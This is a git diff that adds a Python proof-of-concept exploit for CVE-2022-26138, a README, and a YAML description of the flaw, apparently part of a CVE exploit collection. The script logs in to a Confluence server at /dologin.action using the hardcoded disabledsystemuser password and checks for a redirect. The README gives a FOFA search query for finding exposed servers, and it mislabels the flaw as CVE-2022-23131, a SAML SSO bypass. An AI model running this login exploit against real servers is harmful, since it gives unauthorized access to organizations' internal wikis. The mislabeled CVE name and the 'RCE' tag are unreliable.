diff --git a/cve/confluence/2022/CVE-2022-26138/CVE-2022-26138.py b/cve/confluence/2022/CVE-2022-26138/CVE-2022-26138.py new file mode 100644 index 0000000000000000000000000000000000000000..2553d28b54d30abf0e959fe7ea0e28b2b9cb024f --- /dev/null +++ b/cve/confluence/2022/CVE-2022-26138/CVE-2022-26138.py @@ -0,0 +1,39 @@ +import time + +import requests +def sendPayload(uri): + url="http://"+uri+"/dologin.action" + headers={ + 'Connection': 'close', + 'Cache-Control': 'max-age=0', + 'Upgrade-Insecure-Requests': '1', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Encoding': 'gzip, deflate', + 'Accept-Language': 'zh-CN,zh;q=0.8', + 'Content-Type':'application/x-www-form-urlencoded' + } + data="os_username=disabledsystemuser&os_password=disabled1system1user6708&login=%E7%99%BB%E5%BD%95&os_destination=%2Findex.action" + try: + res = requests.post(url=url,headers=headers,allow_redirects=False,data=data,timeout=20) + print(url) + return res + except requests.exceptions.ConnectionError: + print('ConnectionError -- please wait 3 seconds') + time.sleep(3) + except requests.exceptions.ChunkedEncodingError: + print('ChunkedEncodingError -- please wait 3 seconds') + time.sleep(3) + except: + print('Unfortunitely -- An Unknow Error Happened, Please wait 3 seconds') + time.sleep(3) + return res +def checkResult(res): + result="/" + if res.status_code == 302: + if result in res.headers['location']: + print('存在此漏洞') + +if __name__ == '__main__': + res = sendPayload("localhost:8090") + checkResult(res) \ No newline at end of file diff --git a/cve/confluence/2022/CVE-2022-26138/README.md b/cve/confluence/2022/CVE-2022-26138/README.md new file mode 100644 index 0000000000000000000000000000000000000000..4163878ff06b6bfdcf84ebcde0a57fd2c12d5b80 --- /dev/null +++ b/cve/confluence/2022/CVE-2022-26138/README.md @@ -0,0 +1,7 @@ +# CVE-2022-26138 + +CVE-2022-23131 - SAML SSO bypass + +``` +fofa: icon_hash="-305179312" +``` \ No newline at end of file diff --git a/cve/confluence/2022/yaml/CVE-2022-26138.yaml b/cve/confluence/2022/yaml/CVE-2022-26138.yaml new file mode 100644 index 0000000000000000000000000000000000000000..d399d06b0dcfa01f9c0ce30e31a678cad9699ec4 --- /dev/null +++ b/cve/confluence/2022/yaml/CVE-2022-26138.yaml @@ -0,0 +1,23 @@ +id: CVE-2022-26138 +source: + https://github.com/shavchen/CVE-2022-26138 +info: + name: Confluence是atlassian公司的产品,是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。 + severity: critical + description: | + 用于Confluence服务器和数据中心的Atlassian Questions For Confluence应用程序在Confluence -users组中创建了一个Confluence用户帐户,用户名为disabledsystemuser,密码为硬编码。了解硬编码密码的远程、未经身份验证的攻击者可以利用这一点登录到Confluence并访问Confluence -users组中用户可访问的所有内容。 + scope-of-influence: + Confluence Server&Data Center 2.7.34 + Confluence Server&Data Center 2.7.35 + Confluence Server&Data Center 3.0.2 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2022-26138 + - https://confluence.atlassian.com/confkb/what-is-the-purpose-of-disabledsystemuser-account-on-confluence-1087511405.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-26138 + cwe-id: CWE-798 + cnvd-id: None + kve-id: None + tags: RCE,cve2022 \ No newline at end of file